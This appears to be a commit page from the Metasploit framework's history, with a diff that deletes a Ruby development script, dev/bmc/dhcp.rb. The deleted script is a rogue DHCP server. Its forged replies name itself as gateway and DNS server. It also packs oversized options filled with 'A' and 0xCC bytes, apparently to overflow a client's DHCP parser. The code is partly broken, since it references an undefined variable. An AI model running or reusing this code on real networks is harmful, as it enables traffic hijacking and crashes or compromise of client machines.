* toast
git-svn-id: file:///home/svn/framework3/trunk@3751 4d416f70-5f16-0410-b530-b9f4589650daunstable
bmc
parent
5c142b2059
commit
03a5a4f787
147
dev/bmc/dhcp.rb
147
dev/bmc/dhcp.rb
|
|
@ -1,147 +0,0 @@
|
||||||
#!ruby
|
|
||||||
|
|
||||||
require 'socket'
|
|
||||||
|
|
||||||
$port = 67
|
|
||||||
$magic = "\x63\x82\x53\x63"
|
|
||||||
$serverip = '10.50.0.116'
|
|
||||||
|
|
||||||
def respond(message = 'test', dstip = '255.255.255.255')
|
|
||||||
warn "sending response"
|
|
||||||
s = UDPSocket.open
|
|
||||||
s.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, 1)
|
|
||||||
s.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEADDR, true)
|
|
||||||
s.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEPORT, true)
|
|
||||||
s.bind('<any>', 68)
|
|
||||||
s.send(message, 0, dstip, 67)
|
|
||||||
p message.unpack('H*')[0].upcase
|
|
||||||
end
|
|
||||||
|
|
||||||
def packip (ip)
|
|
||||||
return ip.split('.').collect { |i| i.to_i }.pack('CCCC')
|
|
||||||
end
|
|
||||||
|
|
||||||
def packmac (mac)
|
|
||||||
return mac.split(':').pack('H2H2H2H2H2H2')
|
|
||||||
end
|
|
||||||
|
|
||||||
def parse (request)
|
|
||||||
if request.length < 236
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
transaction = request[4..8].unpack('N')[0]
|
|
||||||
mac = request[28..33].unpack('H2H2H2H2H2H2').join(':')
|
|
||||||
ip = '10.50.0.136'
|
|
||||||
|
|
||||||
begin
|
|
||||||
ip = request[246+ a[246..-1].index("\x32\x04")+2,4].unpack('C*')
|
|
||||||
rescue
|
|
||||||
end
|
|
||||||
return [transaction, mac, ip]
|
|
||||||
end
|
|
||||||
|
|
||||||
def encode (type, value)
|
|
||||||
if (value.length > 255)
|
|
||||||
raise "invalid option"
|
|
||||||
end
|
|
||||||
|
|
||||||
return [type, value.length].pack('CC') + value
|
|
||||||
end
|
|
||||||
|
|
||||||
def offer ( transaction, mac, ip = '10.10.10.12' )
|
|
||||||
|
|
||||||
packet =
|
|
||||||
"\x02\x01\x06\x00" + #Preamble
|
|
||||||
[transaction, 0 ].pack('NN') + # transaction + flags
|
|
||||||
|
|
||||||
packip('0.0.0.0') + # client ip
|
|
||||||
packip(ip) + # server ip
|
|
||||||
packip('172.16.16.1') + # next server IP
|
|
||||||
packip('0.0.0.0') + # relay agent IP
|
|
||||||
|
|
||||||
packmac(mac) + #Client MAC
|
|
||||||
"\x00" * 10 + # chaddr padding
|
|
||||||
"\x00" * (16 * 4) + # server hostname
|
|
||||||
"\x00" * (16 * 8) + # boot filename
|
|
||||||
$magic + # magic cookie
|
|
||||||
encode(0x35, "\x02") + # message type
|
|
||||||
encode(0x36, packip($serverip)) + # Serevr identifier
|
|
||||||
encode(0x33, "\x00\x00\xa8\xc0") + # IP lease time
|
|
||||||
encode(0x01, "\xFF\xFF\x00\x00") + # subnet mask
|
|
||||||
encode(0x0f, "metasploit.com") + # domain name
|
|
||||||
encode(0x03, packip($serverip)) + # router IP
|
|
||||||
encode(0x06, packip($serverip) + packip($serverip)) + # DNS (2 dns servers)
|
|
||||||
encode(0x2c, packip($serverip)) + # netbios name server
|
|
||||||
encode(0x2e, "\x08") + # node type
|
|
||||||
"\xff" # no more options
|
|
||||||
end
|
|
||||||
|
|
||||||
def request ( transaction, mac, ip = '10.10.10.12' )
|
|
||||||
packet =
|
|
||||||
"\x02\x01\x06\x00" + #Preamble
|
|
||||||
[transaction, 0 ].pack('NN') + # transaction + flags
|
|
||||||
|
|
||||||
packip('0.0.0.0') + # client IP
|
|
||||||
|
|
||||||
packip(ip) + # Server IP
|
|
||||||
packip($serverip) + # next server IP
|
|
||||||
packip('0.0.0.0') + # relay agent IP
|
|
||||||
|
|
||||||
packmac(mac) + # client MAC address
|
|
||||||
"\x00" * 10 + # chaddr padding
|
|
||||||
"\x00" * (16 * 4) + # server hostname
|
|
||||||
"\x00" * (16 * 8) + # boot filename
|
|
||||||
$magic + # magic cookie
|
|
||||||
|
|
||||||
encode(0x35, "\x05") +
|
|
||||||
encode(0x36, packip($serverip)) + # server identifier
|
|
||||||
encode(0x33, "\x00\x00\xa8\xc0") + # lease time
|
|
||||||
encode(0x01, packip('255.255.0.0')) + # subnet
|
|
||||||
encode(0x03, packip($serverip)) + # router IP
|
|
||||||
encode(0x06, packip($serverip) + packip($serverip)) + # DNS SERVER
|
|
||||||
encode(0x2c, packip('10.1.1.100')) + # netbios name server
|
|
||||||
encode(0x2e, "\x08") +
|
|
||||||
|
|
||||||
encode(0x0f, "AB" + "A" * 0xfd) +
|
|
||||||
encode(0xfa, ("A" * 0x8f) + ("\xcc" * 0x70)) +
|
|
||||||
encode(0xfa, "\xCC" * 0xff) +
|
|
||||||
encode(0xfa, "\xCC" * 0xff) +
|
|
||||||
encode(0xfa, ("\x01\x0B" * 0x7f) + "\x00")+
|
|
||||||
"\xff"
|
|
||||||
end
|
|
||||||
|
|
||||||
system("arp -da")
|
|
||||||
sThread = Thread.start do # run server in a thread
|
|
||||||
server = UDPSocket.open
|
|
||||||
server.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEADDR, true)
|
|
||||||
server.setsockopt(Socket::SOL_SOCKET, Socket::SO_REUSEPORT, true)
|
|
||||||
server.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, 1)
|
|
||||||
server.bind('<any>', $port)
|
|
||||||
while (1)
|
|
||||||
request = server.recvfrom(1024)
|
|
||||||
(transaction, mac, ip) = parse(request[0])
|
|
||||||
p ip
|
|
||||||
if !transaction.nil?
|
|
||||||
p 'here1'
|
|
||||||
p mac
|
|
||||||
# if mac == "00:0c:29:d6:d1:62"
|
|
||||||
p 'here2'
|
|
||||||
system("echo arp -s #{ip} #{mac}")
|
|
||||||
system("arp -s #{ip} #{mac}")
|
|
||||||
respond(offer(transaction, mac, ip), ip)
|
|
||||||
sleep(1)
|
|
||||||
respond(request(transaction, mac, ip), ip)
|
|
||||||
# else
|
|
||||||
#p "not right mac!"
|
|
||||||
#end
|
|
||||||
else
|
|
||||||
p "not dhcp"
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
respond()
|
|
||||||
respond()
|
|
||||||
|
|
||||||
sThread.join
|
|
||||||
Loading…
Reference in New Issue